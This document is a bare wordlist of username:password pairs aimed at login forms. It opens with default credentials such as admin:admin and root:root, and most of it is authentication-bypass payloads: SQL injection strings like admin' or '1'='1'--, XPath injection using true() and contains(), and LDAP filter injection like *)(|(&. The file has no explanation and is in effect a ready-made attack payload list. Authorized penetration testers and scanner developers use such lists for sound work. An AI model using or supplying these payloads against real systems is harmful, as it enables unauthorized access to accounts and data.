test:test
admin:admin
username:Password
root:root
toor:toor
guest:guest
' or '1'='1:' or '1'='1
' or ''=':' or ''='
' or 1]%00:' or 1]%00
' or /* or ':' or /* or '
' or "a" or ':' or "a" or '
' or 1 or ':' or 1 or '
' or true() or ':' or true() or '
'or string-length(name(.))<10 or':'or string-length(name(.))<10 or'
practice:SuperSecretPassword!
'or contains(name,'adm') or':'or contains(name,'adm') or'
'or contains(.,'adm') or':'or contains(.,'adm') or'
'or position()=2 or':'or position()=2 or'
admin' or ':admin' or '
admin' or '1'='2:admin' or '1'='2
*:*
*)(&:*)(&
*)(|(&:*)(|(&
pwd):pwd)
*)(|(*:*)(|(*
*))%00:*))%00
admin)(&):admin)(&)
pwd:pwd
admin)(!(&(|:admin)(!(&(|
pwd)):pwd))
admin))(|(|:admin))(|(|
1234:1234
or 1=1:or 1=1
or 1=1--:or 1=1--
or 1=1#:or 1=1#
or 1=1/*:or 1=1/*
admin' --:admin' --
admin' #:admin' #
admin'/*:admin'/*
admin' or '1'='1:admin' or '1'='1
admin' or '1'='1'--:admin' or '1'='1'--
admin' or '1'='1'#:admin' or '1'='1'#
admin' or '1'='1'/*:admin' or '1'='1'/*
admin'or 1=1 or ''=':admin'or 1=1 or ''='
admin' or 1=1:admin' or 1=1
admin' or 1=1--:admin' or 1=1--
admin' or 1=1#:admin' or 1=1#
admin' or 1=1/*:admin' or 1=1/*
admin') or ('1'='1:admin') or ('1'='1
admin') or ('1'='1'--:admin') or ('1'='1'--
admin') or ('1'='1'#:admin') or ('1'='1'#
admin') or ('1'='1'/*:admin') or ('1'='1'/*
admin') or '1'='1:admin') or '1'='1
admin') or '1'='1'--:admin') or '1'='1'--
admin') or '1'='1'#:admin') or '1'='1'#
admin') or '1'='1'/*:admin') or '1'='1'/*